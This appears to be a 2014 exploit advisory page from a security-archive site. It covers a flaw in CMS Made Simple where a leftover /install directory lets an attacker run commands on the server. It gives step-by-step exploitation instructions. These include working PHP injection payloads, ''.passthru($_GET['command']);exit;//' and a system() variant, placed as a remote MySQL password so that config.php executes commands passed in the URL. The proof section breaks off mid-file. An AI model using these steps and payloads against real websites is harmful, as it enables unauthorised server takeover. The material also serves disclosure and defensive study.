CMS Made Simple Install SQL Injection Command Execution

2014.12.09
Credit: SAHM
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-78

# CMS Made Simple PHP Code Injection Vulnerability (All versions) # 2014-12-02 # SAHM (@post.com) # cmsmadesimple.org # All versions ---exploit A malicious attacker can intrude every CMSMS-installed website by taking the following steps: Open the /install folder from the URL (The cms doesn't force users to delete the directory after finishing the installation progress). Ex: http://URL/PATH/install Pass through the steps to get to the fifth step. In a remote host, install a MySQL server and create the following user: user: test password : '.passthru($_GET['command']);exit;// Following that, Create a remotely accessible database and grant all privileges to the user (for further information please read : http://www.cyberciti.biz/tips/how-do-i-enable-remote-access-to-mysql-database-server.html) . Fill in the Database Information form (bottom of the page). db host address: the remote host's IP user: test password: '.system($_GET['command']);exit;// database name: the name of the remote database which has been built After installation, commands can be injected as: http://URL/PATH?command=blah%20blah ---prove At this point, the config.php file content would be something like this: <?php # CMS Made Simple Configuration File # Documentation: /doc/CMSMS_config_reference.pdf #


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top